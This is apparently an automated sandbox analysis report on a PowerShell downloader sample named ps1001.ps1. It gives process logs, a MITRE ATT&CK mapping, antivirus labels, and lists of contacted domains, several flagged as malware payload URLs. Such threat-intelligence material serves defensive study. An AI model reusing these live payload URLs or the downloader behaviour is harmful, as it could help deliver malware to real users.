    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    MITRE ATT&CK matrix, listed per tactic (bracketed numbers are the counts shown against a technique in the original matrix):

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
    Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [21]; Process Injection [11]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Steganography
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [12]
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [3]; Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
    Source | Detection | Scanner | Label
    ps1001.ps1 | 63% | ReversingLabs | Script-PowerShell.Downloader.Donoff
    ps1001.ps1 | 100% | Avira | TR/PowerShell.Gen
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://bemnyc.com | 0% | Avira URL Cloud | safe
    http://fenett2018.com | 100% | Avira URL Cloud | malware
    https://status.squarespace.com | 0% | Avira URL Cloud | safe
    http://eastend.jp/bl5kfa | 100% | Avira URL Cloud | malware
    http://habarimoto24.com | 0% | Avira URL Cloud | safe
    http://yourmother4cancer.info | 100% | Avira URL Cloud | malware
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23 | 100% | Avira URL Cloud | malware
    http://eastend.jp | 100% | Avira URL Cloud | malware
    http://bemnyc.com/u8erijeq | 100% | Avira URL Cloud | malware
    http://fenett2018.com/dobgx | 100% | Avira URL Cloud | malware
    http://habarimoto24.com/nh | 0% | Avira URL Cloud | safe
    http://abakus-biuro.net | 0% | Avira URL Cloud | safe
    http://abakus-biuro.net//a9zqemm | 100% | Avira URL Cloud | malware
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    eastend.jp | 162.43.104.133 | true | false | - | unknown
    bemnyc.com | 198.185.159.145 | true | false | - | unknown
    fenett2018.com | unknown | unknown | false | - | unknown
    yourmother4cancer.info | unknown | unknown | false | - | unknown
    habarimoto24.com | unknown | unknown | false | - | unknown
    abakus-biuro.net | unknown | unknown | false | - | unknown
    Name | Malicious | Antivirus Detection | Reputation
    http://bemnyc.com/u8erijeq | false | Avira URL Cloud: malware | unknown
    http://eastend.jp/bl5kfa | false | Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2374538901.0000025010DE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://yourmother4cancer.info | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://go.micro | powershell.exe, 00000001.00000002.2351696748.0000025001BBD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://status.squarespace.com | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23 | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://contoso.com/License | powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://contoso.com/Icon | powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000001.00000002.2351696748.000002500181C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://bemnyc.com | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://eastend.jp | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://fenett2018.com | powershell.exe, 00000001.00000002.2351696748.00000250003ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://contoso.com/ | powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://habarimoto24.com | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://fenett2018.com/dobgx | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | false | Avira URL Cloud: malware | unknown
    http://habarimoto24.com/nh | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | false | Avira URL Cloud: safe | unknown
    https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://abakus-biuro.net//a9zqemm | powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | false | Avira URL Cloud: malware | unknown
    http://abakus-biuro.net | powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    198.185.159.145 | bemnyc.com | United States | 53831 | SQUARESPACEUS | false
    162.43.104.133 | eastend.jp | United States | 11333 | CYBERTRAILSUS | false
    Joe Sandbox version: 41.0.0 Charoite
    Analysis ID: 1560751
    Start date and time: 2024-11-22 09:26:46 +01:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 5m 4s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed: 9
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: ps1001.ps1
    Detection: MAL
